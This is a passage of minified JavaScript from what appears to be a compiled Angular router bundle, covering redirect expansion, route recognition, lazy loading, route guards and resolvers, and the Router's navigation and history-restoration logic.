this.expandSegmentGroup(a,d,c,r).pipe(Xe(T=>({segment:T,outlet:r})))}),JN((r,c)=>(r[c.outlet]=c.segment,r),{}),ZN())}expandSegment(a,e,i,n,r,c){return Sa(i).pipe(Rh(d=>this.expandSegmentAgainstRoute(a,e,i,d,n,r,c).pipe(Sh(k=>{if(k instanceof o3)return Bi(null);throw k}))),Dd(d=>!!d),Sh((d,T)=>{if(Fx(d))return zL(e,n,r)?Bi(new qn([],{})):ky(e);throw d}))}expandSegmentAgainstRoute(a,e,i,n,r,c,d){return LL(n,e,r,c)?void 0===n.redirectTo?this.matchSegmentAgainstRoute(a,e,n,r,c):d&&this.allowRedirects?this.expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c):ky(e):ky(e)}expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){return"**"===n.path?this.expandWildCardWithParamsAgainstRouteUsingRedirect(a,i,n,c):this.expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c)}expandWildCardWithParamsAgainstRouteUsingRedirect(a,e,i,n){const r=this.applyRedirectCommands([],i.redirectTo,{});return i.redirectTo.startsWith("/")?FL(r):this.lineralizeSegments(i,r).pipe(Ut(c=>{const d=new qn(c,{});return this.expandSegment(a,d,e,c,n,!1)}))}expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){const{matched:d,consumedSegments:T,remainingSegments:k,positionalParamSegments:q}=Bx(e,n,r);if(!d)return ky(e);const Y=this.applyRedirectCommands(T,n.redirectTo,q);return n.redirectTo.startsWith("/")?FL(Y):this.lineralizeSegments(n,Y).pipe(Ut(te=>this.expandSegment(a,e,i,te.concat(k),c,!1)))}matchSegmentAgainstRoute(a,e,i,n,r){return"**"===i.path?(a=SL(i,a),i.loadChildren?(i._loadedRoutes?Bi({routes:i._loadedRoutes,injector:i._loadedInjector}):this.configLoader.loadChildren(a,i)).pipe(Xe(d=>(i._loadedRoutes=d.routes,i._loadedInjector=d.injector,new qn(n,{})))):Bi(new qn(n,{}))):NL(e,i,n,a).pipe(Ur(({matched:c,consumedSegments:d,remainingSegments:T})=>{var k;return c?(a=null!==(k=i._injector)&&void 0!==k?k:a,this.getChildConfig(a,i,n).pipe(Ut(Y=>{var te;const pe=null!==(te=Y.injector)&&void 0!==te?te:a,Re=Y.routes,{segmentGroup:Fe,slicedSegments:Ne}=t3(e,d,T,Re),et=new qn(Fe.segments,Fe.children);if(0===Ne.length&&et.hasChildren())return this.expandChildren(pe,Re,et).pipe(Xe(It=>new qn(d,It)));if(0===Re.length&&0===Ne.length)return Bi(new qn(d,{}));const ut=xd(i)===r;return this.expandSegment(pe,et,Re,Ne,ut?Nn:r,!0).pipe(Xe(yt=>new qn(d.concat(yt.segments),yt.children)))}))):ky(e)}))}getChildConfig(a,e,i){return e.children?Bi({routes:e.children,injector:a}):e.loadChildren?void 0!==e._loadedRoutes?Bi({routes:e._loadedRoutes,injector:e._loadedInjector}):function Lue(t,a,e,i){const n=a.canLoad;return void 0===n||0===n.length?Bi(!0):Bi(n.map(c=>{const d=E1(c,t);return cp(function vue(t){return t&&Sy(t.canLoad)}(d)?d.canLoad(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL())}(a,e,i).pipe(Ut(n=>n?this.configLoader.loadChildren(a,e).pipe(qr(r=>{e._loadedRoutes=r.routes,e._loadedInjector=r.injector})):function Uue(t){return b1(wL(n3,3))}())):Bi({routes:[],injector:a})}lineralizeSegments(a,e){let i=[],n=e.root;for(;;){if(i=i.concat(n.segments),0===n.numberOfChildren)return Bi(i);if(n.numberOfChildren>1||!n.children[Nn])return b1(new gi(4e3,n3));n=n.children[Nn]}}applyRedirectCommands(a,e,i){return this.applyRedirectCreateUrlTree(e,this.urlSerializer.parse(e),a,i)}applyRedirectCreateUrlTree(a,e,i,n){const r=this.createSegmentGroup(a,e.root,i,n);return new fg(r,this.createQueryParams(e.queryParams,this.urlTree.queryParams),e.fragment)}createQueryParams(a,e){const i={};return oc(a,(n,r)=>{if("string"==typeof n&&n.startsWith(":")){const d=n.substring(1);i[r]=e[d]}else i[r]=n}),i}createSegmentGroup(a,e,i,n){const r=this.createSegments(a,e.segments,i,n);let c={};return oc(e.children,(d,T)=>{c[T]=this.createSegmentGroup(a,d,i,n)}),new qn(r,c)}createSegments(a,e,i,n){return e.map(r=>r.path.startsWith(":")?this.findPosParam(a,r,n):this.findOrReturn(r,i))}findPosParam(a,e,i){const n=i[e.path.substring(1)];if(!n)throw new gi(4001,n3);return n}findOrReturn(a,e){let i=0;for(const n of e){if(n.path===a.path)return e.splice(i),n;i++}return a}}class Que{}class Xue{constructor(a,e,i,n,r,c,d,T){this.injector=a,this.rootComponentType=e,this.config=i,this.urlTree=n,this.url=r,this.paramsInheritanceStrategy=c,this.relativeLinkResolution=d,this.urlSerializer=T}recognize(){const a=t3(this.urlTree.root,[],[],this.config.filter(e=>void 0===e.redirectTo),this.relativeLinkResolution).segmentGroup;return this.processSegmentGroup(this.injector,this.config,a,Nn).pipe(Xe(e=>{if(null===e)return null;const i=new Y4([],Object.freeze({}),Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,{},Nn,this.rootComponentType,null,this.urlTree.root,-1,{}),n=new Oh(i,e),r=new EL(this.url,n);return this.inheritParamsAndData(r._root),r}))}inheritParamsAndData(a){const e=a.value,i=TL(e,this.paramsInheritanceStrategy);e.params=Object.freeze(i.params),e.data=Object.freeze(i.data),a.children.forEach(n=>this.inheritParamsAndData(n))}processSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.processChildren(a,e,i):this.processSegment(a,e,i,i.segments,n)}processChildren(a,e,i){return Sa(Object.keys(i.children)).pipe(Rh(n=>{const r=i.children[n],c=kL(e,n);return this.processSegmentGroup(a,c,r,n)}),JN((n,r)=>n&&r?(n.push(...r),n):null),eL(n=>null!==n),B4(null),ZN(),Xe(n=>{if(null===n)return null;const r=VL(n);return function Yue(t){t.sort((a,e)=>a.value.outlet===Nn?-1:e.value.outlet===Nn?1:a.value.outlet.localeCompare(e.value.outlet))}(r),r}))}processSegment(a,e,i,n,r){return Sa(e).pipe(Rh(c=>{var d;return this.processSegmentAgainstRoute(null!==(d=c._injector)&&void 0!==d?d:a,c,i,n,r)}),Dd(c=>!!c),Sh(c=>{if(Fx(c))return zL(i,n,r)?Bi([]):Bi(null);throw c}))}processSegmentAgainstRoute(a,e,i,n,r){var c,d;if(e.redirectTo||!LL(e,i,n,r))return Bi(null);let T;if("**"===e.path){const k=n.length>0?aL(n).parameters:{},q=HL(i)+n.length;T=Bi({snapshot:new Y4(n,k,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),xd(e),null!==(d=null!==(c=e.component)&&void 0!==c?c:e._loadedComponent)&&void 0!==d?d:null,e,BL(i),q,GL(e),q),consumedSegments:[],remainingSegments:[]})}else T=NL(i,e,n,a).pipe(Xe(({matched:k,consumedSegments:q,remainingSegments:Y,parameters:te})=>{var pe,Re;if(!k)return null;const Fe=HL(i)+q.length;return{snapshot:new Y4(q,te,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),xd(e),null!==(Re=null!==(pe=e.component)&&void 0!==pe?pe:e._loadedComponent)&&void 0!==Re?Re:null,e,BL(i),Fe,GL(e),Fe),consumedSegments:q,remainingSegments:Y}}));return T.pipe(Ur(k=>{var q,Y;if(null===k)return Bi(null);const{snapshot:te,consumedSegments:pe,remainingSegments:Re}=k;a=null!==(q=e._injector)&&void 0!==q?q:a;const Fe=null!==(Y=e._loadedInjector)&&void 0!==Y?Y:a,Ne=function Jue(t){return t.children?t.children:t.loadChildren?t._loadedRoutes:[]}(e),{segmentGroup:et,slicedSegments:ut}=t3(i,pe,Re,Ne.filter(yt=>void 0===yt.redirectTo),this.relativeLinkResolution);if(0===ut.length&&et.hasChildren())return this.processChildren(Fe,Ne,et).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]));if(0===Ne.length&&0===ut.length)return Bi([new Oh(te,[])]);const Ze=xd(e)===r;return this.processSegment(Fe,Ne,et,ut,Ze?Nn:r).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]))}))}}function Zue(t){const a=t.value.routeConfig;return a&&""===a.path&&void 0===a.redirectTo}function VL(t){const a=[],e=new Set;for(const i of t){if(!Zue(i)){a.push(i);continue}const n=a.find(r=>i.value.routeConfig===r.value.routeConfig);void 0!==n?(n.children.push(...i.children),e.add(n)):a.push(i)}for(const i of e){const n=VL(i.children);a.push(new Oh(i.value,n))}return a.filter(i=>!e.has(i))}function BL(t){let a=t;for(;a._sourceSegment;)a=a._sourceSegment;return a}function HL(t){var a,e;let i=t,n=null!==(a=i._segmentIndexShift)&&void 0!==a?a:0;for(;i._sourceSegment;)i=i._sourceSegment,n+=null!==(e=i._segmentIndexShift)&&void 0!==e?e:0;return n-1}function qL(t){return t.data||{}}function GL(t){return t.resolve||{}}function jL(t){return"string"==typeof t.title||null===t.title}function Hx(t){return Ur(a=>{const e=t(a);return e?Sa(e).pipe(Xe(()=>a)):Bi(a)})}let QL=(()=>{class t{buildTitle(e){var i;let n,r=e.root;for(;void 0!==r;)n=null!==(i=this.getResolvedTitleForRoute(r))&&void 0!==i?i:n,r=r.children.find(c=>c.outlet===Nn);return n}getResolvedTitleForRoute(e){return e.data[yy]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po($L)},providedIn:"root"}),t})(),$L=(()=>{class t extends QL{constructor(e){super(),this.title=e}updateTitle(e){const i=this.buildTitle(e);void 0!==i&&this.title.setTitle(i)}}return t.\u0275fac=function(e){return new(e||t)(At(UP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class she{}class lhe extends class che{shouldDetach(a){return!1}store(a,e){}shouldAttach(a){return!1}retrieve(a){return null}shouldReuseRoute(a,e){return a.routeConfig===e.routeConfig}}{}const s3=new ni("",{providedIn:"root",factory:()=>({})}),Ux=new ni("ROUTES");let qx=(()=>{class t{constructor(e,i){this.injector=e,this.compiler=i,this.componentLoaders=new WeakMap,this.childrenLoaders=new WeakMap}loadComponent(e){if(this.componentLoaders.get(e))return this.componentLoaders.get(e);if(e._loadedComponent)return Bi(e._loadedComponent);this.onLoadStartListener&&this.onLoadStartListener(e);const i=cp(e.loadComponent()).pipe(qr(r=>{this.onLoadEndListener&&this.onLoadEndListener(e),e._loadedComponent=r}),U4(()=>{this.componentLoaders.delete(e)})),n=new bx(i,()=>new J).pipe(yx());return this.componentLoaders.set(e,n),n}loadChildren(e,i){if(this.childrenLoaders.get(i))return this.childrenLoaders.get(i);if(i._loadedRoutes)return Bi({routes:i._loadedRoutes,injector:i._loadedInjector});this.onLoadStartListener&&this.onLoadStartListener(i);const r=this.loadModuleFactoryOrRoutes(i.loadChildren).pipe(Xe(d=>{this.onLoadEndListener&&this.onLoadEndListener(i);let T,k,q=!1;Array.isArray(d)?k=d:(T=d.create(e).injector,k=iL(T.get(Ux,[],Da.Self|Da.Optional)));return{routes:k.map(Wx),injector:T}}),U4(()=>{this.childrenLoaders.delete(i)})),c=new bx(r,()=>new J).pipe(yx());return this.childrenLoaders.set(i,c),c}loadModuleFactoryOrRoutes(e){return cp(e()).pipe(Ut(i=>i instanceof Ok||Array.isArray(i)?Bi(i):Sa(this.compiler.compileModuleAsync(i))))}}return t.\u0275fac=function(e){return new(e||t)(At(Ko),At(WD))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class mhe{}class uhe{shouldProcessUrl(a){return!0}extract(a){return a}merge(a,e){return a}}function hhe(t){throw t}function fhe(t,a,e){return a.parse("/")}const phe={paths:"exact",fragment:"ignored",matrixParams:"ignored",queryParams:"exact"},_he={paths:"subset",fragment:"ignored",matrixParams:"ignored",queryParams:"subset"};function XL(){var t,a;const e=Po(lL),i=Po(xy),n=Po(iy),r=Po(Ko),c=Po(WD),d=null!==(t=Po(Ux,{optional:!0}))&&void 0!==t?t:[],T=null!==(a=Po(s3,{optional:!0}))&&void 0!==a?a:{},k=Po($L),q=Po(QL,{optional:!0}),Y=Po(mhe,{optional:!0}),te=Po(she,{optional:!0}),pe=new Oo(null,e,i,n,r,c,iL(d));return Y&&(pe.urlHandlingStrategy=Y),te&&(pe.routeReuseStrategy=te),pe.titleStrategy=null!=q?q:k,function ghe(t,a){t.errorHandler&&(a.errorHandler=t.errorHandler),t.malformedUriErrorHandler&&(a.malformedUriErrorHandler=t.malformedUriErrorHandler),t.onSameUrlNavigation&&(a.onSameUrlNavigation=t.onSameUrlNavigation),t.paramsInheritanceStrategy&&(a.paramsInheritanceStrategy=t.paramsInheritanceStrategy),t.relativeLinkResolution&&(a.relativeLinkResolution=t.relativeLinkResolution),t.urlUpdateStrategy&&(a.urlUpdateStrategy=t.urlUpdateStrategy),t.canceledNavigationResolution&&(a.canceledNavigationResolution=t.canceledNavigationResolution)}(T,pe),pe}let Oo=(()=>{class t{constructor(e,i,n,r,c,d,T){this.rootComponentType=e,this.urlSerializer=i,this.rootContexts=n,this.location=r,this.config=T,this.lastSuccessfulNavigation=null,this.currentNavigation=null,this.disposed=!1,this.navigationId=0,this.currentPageId=0,this.isNgZoneEnabled=!1,this.events=new J,this.errorHandler=hhe,this.malformedUriErrorHandler=fhe,this.navigated=!1,this.lastSuccessfulId=-1,this.afterPreactivation=()=>Bi(void 0),this.urlHandlingStrategy=new uhe,this.routeReuseStrategy=new lhe,this.onSameUrlNavigation="ignore",this.paramsInheritanceStrategy="emptyOnly",this.urlUpdateStrategy="deferred",this.relativeLinkResolution="corrected",this.canceledNavigationResolution="replace",this.configLoader=c.get(qx),this.configLoader.onLoadEndListener=te=>this.triggerEvent(new Jme(te)),this.configLoader.onLoadStartListener=te=>this.triggerEvent(new Yme(te)),this.ngModule=c.get(eg),this.console=c.get(ioe);const Y=c.get(qi);this.isNgZoneEnabled=Y instanceof qi&&qi.isInAngularZone(),this.resetConfig(T),this.currentUrlTree=function Mme(){return new fg(new qn([],{}),{},null)}(),this.rawUrlTree=this.currentUrlTree,this.browserUrlTree=this.currentUrlTree,this.routerState=AL(this.currentUrlTree,this.rootComponentType),this.transitions=new zs({id:0,targetPageId:0,currentUrlTree:this.currentUrlTree,currentRawUrl:this.currentUrlTree,extractedUrl:this.urlHandlingStrategy.extract(this.currentUrlTree),urlAfterRedirects:this.urlHandlingStrategy.extract(this.currentUrlTree),rawUrl:this.currentUrlTree,extras:{},resolve:null,reject:null,promise:Promise.resolve(!0),source:"imperative",restoredState:null,currentSnapshot:this.routerState.snapshot,targetSnapshot:null,currentRouterState:this.routerState,targetRouterState:null,guards:{canActivateChecks:[],canDeactivateChecks:[]},guardsResult:null}),this.navigations=this.setupNavigations(this.transitions),this.processNavigations()}get browserPageId(){var e;return null===(e=this.location.getState())||void 0===e?void 0:e.\u0275routerPageId}setupNavigations(e){const i=this.events;return e.pipe(Dn(n=>0!==n.id),Xe(n=>Object.assign(Object.assign({},n),{extractedUrl:this.urlHandlingStrategy.extract(n.rawUrl)})),Ur(n=>{let r=!1,c=!1;return Bi(n).pipe(qr(d=>{this.currentNavigation={id:d.id,initialUrl:d.rawUrl,extractedUrl:d.extractedUrl,trigger:d.source,extras:d.extras,previousNavigation:this.lastSuccessfulNavigation?Object.assign(Object.assign({},this.lastSuccessfulNavigation),{previousNavigation:null}):null}}),Ur(d=>{const T=this.browserUrlTree.toString(),k=!this.navigated||d.extractedUrl.toString()!==T||T!==this.currentUrlTree.toString();if(("reload"===this.onSameUrlNavigation||k)&&this.urlHandlingStrategy.shouldProcessUrl(d.rawUrl))return YL(d.source)&&(this.browserUrlTree=d.extractedUrl),Bi(d).pipe(Ur(Y=>{const te=this.transitions.getValue();return i.next(new Ey(Y.id,this.serializeUrl(Y.extractedUrl),Y.source,Y.restoredState)),te!==this.transitions.getValue()?ua:Promise.resolve(Y)}),function jue(t,a,e,i){return Ur(n=>function que(t,a,e,i,n){return new Gue(t,a,e,i,n).apply()}(t,a,e,n.extractedUrl,i).pipe(Xe(r=>Object.assign(Object.assign({},n),{urlAfterRedirects:r}))))}(this.ngModule.injector,this.configLoader,this.urlSerializer,this.config),qr(Y=>{this.currentNavigation=Object.assign(Object.assign({},this.currentNavigation),{finalUrl:Y.urlAfterRedirects}),n.urlAfterRedirects=Y.urlAfterRedirects}),function the(t,a,e,i,n,r){return Ut(c=>function Kue(t,a,e,i,n,r,c="emptyOnly",d="legacy"){return new Xue(t,a,e,i,n,c,d,r).recognize().pipe(Ur(T=>null===T?function $ue(t){return new G(a=>a.error(t))}(new Que):Bi(T)))}(t,a,e,c.urlAfterRedirects,i.serialize(c.urlAfterRedirects),i,n,r).pipe(Xe(d=>Object.assign(Object.assign({},c),{targetSnapshot:d}))))}(this.ngModule.injector,this.rootComponentType,this.config,this.urlSerializer,this.paramsInheritanceStrategy,this.relativeLinkResolution),qr(Y=>{if(n.targetSnapshot=Y.targetSnapshot,"eager"===this.urlUpdateStrategy){if(!Y.extras.skipLocationChange){const pe=this.urlHandlingStrategy.merge(Y.urlAfterRedirects,Y.rawUrl);this.setBrowserUrl(pe,Y)}this.browserUrlTree=Y.urlAfterRedirects}const te=new jme(Y.id,this.serializeUrl(Y.extractedUrl),this.serializeUrl(Y.urlAfterRedirects),Y.targetSnapshot);i.next(te)}));if(k&&this.rawUrlTree&&this.urlHandlingStrategy.shouldProcessUrl(this.rawUrlTree)){const{id:te,extractedUrl:pe,source:Re,restoredState:Fe,extras:Ne}=d,et=new Ey(te,this.serializeUrl(pe),Re,Fe);i.next(et);const ut=AL(pe,this.rootComponentType).snapshot;return Bi(n=Object.assign(Object.assign({},d),{targetSnapshot:ut,urlAfterRedirects:pe,extras:Object.assign(Object.assign({},Ne),{skipLocationChange:!1,replaceUrl:!1})}))}return this.rawUrlTree=d.rawUrl,d.resolve(null),ua}),qr(d=>{const T=new Qme(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot);this.triggerEvent(T)}),Xe(d=>n=Object.assign(Object.assign({},d),{guards:gue(d.targetSnapshot,d.currentSnapshot,this.rootContexts)})),function wue(t,a){return Ut(e=>{const{targetSnapshot:i,currentSnapshot:n,guards:{canActivateChecks:r,canDeactivateChecks:c}}=e;return 0===c.length&&0===r.length?Bi(Object.assign(Object.assign({},e),{guardsResult:!0})):function Iue(t,a,e,i){return Sa(t).pipe(Ut(n=>function Nue(t,a,e,i,n){const r=a&&a.routeConfig?a.routeConfig.canDeactivate:null;return r&&0!==r.length?Bi(r.map(d=>{var T;const k=null!==(T=wy(a))&&void 0!==T?T:n,q=E1(d,k);return cp(function Eue(t){return t&&Sy(t.canDeactivate)}(q)?q.canDeactivate(t,a,e,i):k.runInContext(()=>q(t,a,e,i))).pipe(Dd())})).pipe(D1()):Bi(!0)}(n.component,n.route,e,a,i)),Dd(n=>!0!==n,!0))}(c,i,n,t).pipe(Ut(d=>d&&function Mue(t){return"boolean"==typeof t}(d)?function Rue(t,a,e,i){return Sa(a).pipe(Rh(n=>hg(function kue(t,a){return null!==t&&a&&a(new Zme(t)),Bi(!0)}(n.route.parent,i),function Sue(t,a){return null!==t&&a&&a(new tue(t)),Bi(!0)}(n.route,i),function Oue(t,a,e){const i=a[a.length-1],r=a.slice(0,a.length-1).reverse().map(c=>function Cue(t){const a=t.routeConfig?t.routeConfig.canActivateChild:null;return a&&0!==a.length?{node:t,guards:a}:null}(c)).filter(c=>null!==c).map(c=>sp(()=>Bi(c.guards.map(T=>{var k;const q=null!==(k=wy(c.node))&&void 0!==k?k:e,Y=E1(T,q);return cp(function Tue(t){return t&&Sy(t.canActivateChild)}(Y)?Y.canActivateChild(i,t):q.runInContext(()=>Y(i,t))).pipe(Dd())})).pipe(D1())));return Bi(r).pipe(D1())}(t,n.path,e),function Pue(t,a,e){const i=a.routeConfig?a.routeConfig.canActivate:null;if(!i||0===i.length)return Bi(!0);const n=i.map(r=>sp(()=>{var c;const d=null!==(c=wy(a))&&void 0!==c?c:e,T=E1(r,d);return cp(function Aue(t){return t&&Sy(t.canActivate)}(T)?T.canActivate(a,t):d.runInContext(()=>T(a,t))).pipe(Dd())}));return Bi(n).pipe(D1())}(t,n.route,e))),Dd(n=>!0!==n,!0))}(i,r,t,a):Bi(d)),Xe(d=>Object.assign(Object.assign({},e),{guardsResult:d})))})}(this.ngModule.injector,d=>this.triggerEvent(d)),qr(d=>{if(n.guardsResult=d.guardsResult,_g(d.guardsResult))throw xL(0,d.guardsResult);const T=new $me(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot,!!d.guardsResult);this.triggerEvent(T)}),Dn(d=>!!d.guardsResult||(this.restoreHistory(d),this.cancelNavigationTransition(d,"",3),!1)),Hx(d=>{if(d.guards.canActivateChecks.length)return Bi(d).pipe(qr(T=>{const k=new Kme(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}),Ur(T=>{let k=!1;return Bi(T).pipe(function ihe(t,a){return Ut(e=>{const{targetSnapshot:i,guards:{canActivateChecks:n}}=e;if(!n.length)return Bi(e);let r=0;return Sa(n).pipe(Rh(c=>function ahe(t,a,e,i){const n=t.routeConfig,r=t._resolve;return void 0!==(null==n?void 0:n.title)&&!jL(n)&&(r[yy]=n.title),function nhe(t,a,e,i){const n=function ohe(t){return[...Object.keys(t),...Object.getOwnPropertySymbols(t)]}(t);if(0===n.length)return Bi({});const r={};return Sa(n).pipe(Ut(c=>function rhe(t,a,e,i){var n;const r=null!==(n=wy(a))&&void 0!==n?n:i,c=E1(t,r);return cp(c.resolve?c.resolve(a,e):r.runInContext(()=>c(a,e)))}(t[c],a,e,i).pipe(Dd(),qr(d=>{r[c]=d}))),Mx(1),H4(r),Sh(c=>Fx(c)?ua:b1(c)))}(r,t,a,i).pipe(Xe(c=>(t._resolvedData=c,t.data=TL(t,e).resolve,n&&jL(n)&&(t.data[yy]=n.title),null)))}(c.route,i,t,a)),qr(()=>r++),Mx(1),Ut(c=>r===n.length?Bi(e):ua))})}(this.paramsInheritanceStrategy,this.ngModule.injector),qr({next:()=>k=!0,complete:()=>{k||(this.restoreHistory(T),this.cancelNavigationTransition(T,"",2))}}))}),qr(T=>{const k=new Xme(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}))}),Hx(d=>{const T=k=>{var q;const Y=[];(null===(q=k.routeConfig)||void 0===q?void 0:q.loadComponent)&&!k.routeConfig._loadedComponent&&Y.push(this.configLoader.loadComponent(k.routeConfig).pipe(qr(te=>{k.component=te}),Xe(()=>{})));for(const te of k.children)Y.push(...T(te));return Y};return ug(T(d.targetSnapshot.root)).pipe(B4(),Cn(1))}),Hx(()=>this.afterPreactivation()),Xe(d=>{const T=function rue(t,a,e){const i=Dy(t,a._root,e?e._root:void 0);return new vL(i,a)}(this.routeReuseStrategy,d.targetSnapshot,d.currentRouterState);return n=Object.assign(Object.assign({},d),{targetRouterState:T})}),qr(d=>{this.currentUrlTree=d.urlAfterRedirects,this.rawUrlTree=this.urlHandlingStrategy.merge(d.urlAfterRedirects,d.rawUrl),this.routerState=d.targetRouterState,"deferred"===this.urlUpdateStrategy&&(d.extras.skipLocationChange||this.setBrowserUrl(this.rawUrlTree,d),this.browserUrlTree=d.urlAfterRedirects)}),((t,a,e)=>Xe(i=>(new _ue(a,i.targetRouterState,i.currentRouterState,e).activate(t),i)))(this.rootContexts,this.routeReuseStrategy,d=>this.triggerEvent(d)),qr({next(){r=!0},complete(){r=!0}}),U4(()=>{var d;r||c||this.cancelNavigationTransition(n,"",1),(null===(d=this.currentNavigation)||void 0===d?void 0:d.id)===n.id&&(this.currentNavigation=null)}),Sh(d=>{var T;if(c=!0,RL(d)){IL(d)||(this.navigated=!0,this.restoreHistory(n,!0));const k=new X4(n.id,this.serializeUrl(n.extractedUrl),d.message,d.cancellationCode);if(i.next(k),IL(d)){const q=this.urlHandlingStrategy.merge(d.url,this.rawUrlTree),Y={skipLocationChange:n.extras.skipLocationChange,replaceUrl:"eager"===this.urlUpdateStrategy||YL(n.source)};this.scheduleNavigation(q,"imperative",null,Y,{resolve:n.resolve,reject:n.reject,promise:n.promise})}else n.resolve(!1)}else{this.restoreHistory(n,!0);const k=new yL(n.id,this.serializeUrl(n.extractedUrl),d,null!==(T=n.targetSnapshot)&&void 0!==T?T:void 0);i.next(k);try{n.resolve(this.errorHandler(d))}catch(q){n.reject(q)}}return ua}))}))}resetRootComponentType(e){this.rootComponentType=e,this.routerState.root.component=this.rootComponentType}setTransition(e){this.transitions.next(Object.assign(Object.assign({},this.transitions.value),e))}initialNavigation(){this.setUpLocationChangeListener(),0===this.navigationId&&this.navigateByUrl(this.location.path(!0),{replaceUrl:!0})}setUpLocationChangeListener(){this.locationSubscription||(this.locationSubscription=this.location.subscribe(e=>{const i="popstate"===e.type?"popstate":"hashchange";"popstate"===i&&setTimeout(()=>{var n;const r={replaceUrl:!0},c=null!==(n=e.state)&&void 0!==n&&n.navigationId?e.state:null;if(c){const T=Object.assign({},c);delete T.navigationId,delete T.\u0275routerPageId,0!==Object.keys(T).length&&(r.state=T)}const d=this.parseUrl(e.url);this.scheduleNavigation(d,i,c,r)},0)}))}get url(){return this.serializeUrl(this.currentUrlTree)}getCurrentNavigation(){return this.currentNavigation}triggerEvent(e){this.events.next(e)}resetConfig(e){this.config=e.map(Wx),this.navigated=!1,this.lastSuccessfulId=-1}ngOnDestroy(){this.dispose()}dispose(){this.transitions.complete(),this.locationSubscription&&(this.locationSubscription.unsubscribe(),this.locationSubscription=void 0),this.disposed=!0}createUrlTree(e,i={}){const{relativeTo:n,queryParams:r,fragment:c,queryParamsHandling:d,preserveFragment:T}=i,k=n||this.routerState.root,q=T?this.currentUrlTree.fragment:c;let Y=null;switch(d){case"merge":Y=Object.assign(Object.assign({},this.currentUrlTree.queryParams),r);break;case"preserve":Y=this.currentUrlTree.queryParams;break;default:Y=r||null}return null!==Y&&(Y=this.removeEmptyProps(Y)),Vme(k,this.currentUrlTree,e,Y,null!=q?q:null)}navigateByUrl(e,i={skipLocationChange:!1}){const n=_g(e)?e:this.parseUrl(e),r=this.urlHandlingStrategy.merge(n,this.rawUrlTree);return this.scheduleNavigation(r,"imperative",null,i)}navigate(e,i={skipLocationChange:!1}){return function Che(t){for(let a=0;a<t.length;a++){if(null==t[a])throw new gi(4008,false)}}(e),this.navigateByUrl(this.createUrlTree(e,i),i)}serializeUrl(e){return this.urlSerializer.serialize(e)}parseUrl(e){let i;try{i=this.urlSerializer.parse(e)}catch(n){i=this.malformedUriErrorHandler(n,this.urlSerializer,e)}return i}isActive(e,i){let n;if(n=!0===i?Object.assign({},phe):!1===i?Object.assign({},_he):i,_g(e))return oL(this.currentUrlTree,e,n);const r=this.parseUrl(e);return oL(this.currentUrlTree,r,n)}removeEmptyProps(e){return Object.keys(e).reduce((i,n)=>{const r=e[n];return null!=r&&(i[n]=r),i},{})}processNavigations(){this.navigations.subscribe(e=>{var i;this.navigated=!0,this.lastSuccessfulId=e.id,this.currentPageId=e.targetPageId,this.events.next(new Ph(e.id,this.serializeUrl(e.extractedUrl),this.serializeUrl(this.currentUrlTree))),this.lastSuccessfulNavigation=this.currentNavigation,null===(i=this.titleStrategy)||void 0===i||i.updateTitle(this.routerState.snapshot),e.resolve(!0)},e=>{this.console.warn(`Unhandled Navigation Error: ${e}`)})}scheduleNavigation(e,i,n,r,c){var d,T;if(this.disposed)return Promise.resolve(!1);let k,q,Y;c?(k=c.resolve,q=c.reject,Y=c.promise):Y=new Promise((Re,Fe)=>{k=Re,q=Fe});const te=++this.navigationId;let pe;return"computed"===this.canceledNavigationResolution?(0===this.currentPageId&&(n=this.location.getState()),pe=n&&n.\u0275routerPageId?n.\u0275routerPageId:r.replaceUrl||r.skipLocationChange?null!==(d=this.browserPageId)&&void 0!==d?d:0:(null!==(T=this.browserPageId)&&void 0!==T?T:0)+1):pe=0,this.setTransition({id:te,targetPageId:pe,source:i,restoredState:n,currentUrlTree:this.currentUrlTree,currentRawUrl:this.rawUrlTree,rawUrl:e,extras:r,resolve:k,reject:q,promise:Y,currentSnapshot:this.routerState.snapshot,currentRouterState:this.routerState}),Y.catch(Re=>Promise.reject(Re))}setBrowserUrl(e,i){const n=this.urlSerializer.serialize(e),r=Object.assign(Object.assign({},i.extras.state),this.generateNgRouterState(i.id,i.targetPageId));this.location.isCurrentPathEqualTo(n)||i.extras.replaceUrl?this.location.replaceState(n,"",r):this.location.go(n,"",r)}restoreHistory(e,i=!1){var n,r;if("computed"===this.canceledNavigationResolution){const c=this.currentPageId-e.targetPageId;"popstate"!==e.source&&"eager"!==this.urlUpdateStrategy&&this.currentUrlTree!==(null===(n=this.currentNavigation)||void 0===n?void 0:n.finalUrl)||0===c?this.currentUrlTree===(null===(r=this.currentNavigation)||void 0===r?void 0:r.finalUrl)&&0===c&&(this.resetState(e),this.browserUrlTree=e.currentUrlTree,this.resetUrlToCurrentUrlTree()):this.location.historyGo(c)}else"replace"===this.canceledNavigationResolution&&(i&&this.resetState(e),this.resetUrlToCurrentUrlTree())}resetState(e){this.routerState=e.currentRouterState,this.currentUrlTree=e.currentUrlTree,this.rawUrlTree=this.urlHandlingStrategy.merge(this.currentUrlTree,e.rawUrl)}resetUrlToCurrentUrlTree(){this.location.replaceState(this.urlSerializer.serialize(this.rawUrlTree),"",this.generateNgRouterState(this.lastSuccessfulId,this.currentPageId))}cancelNavigationTransition(e,i,n){const r=new 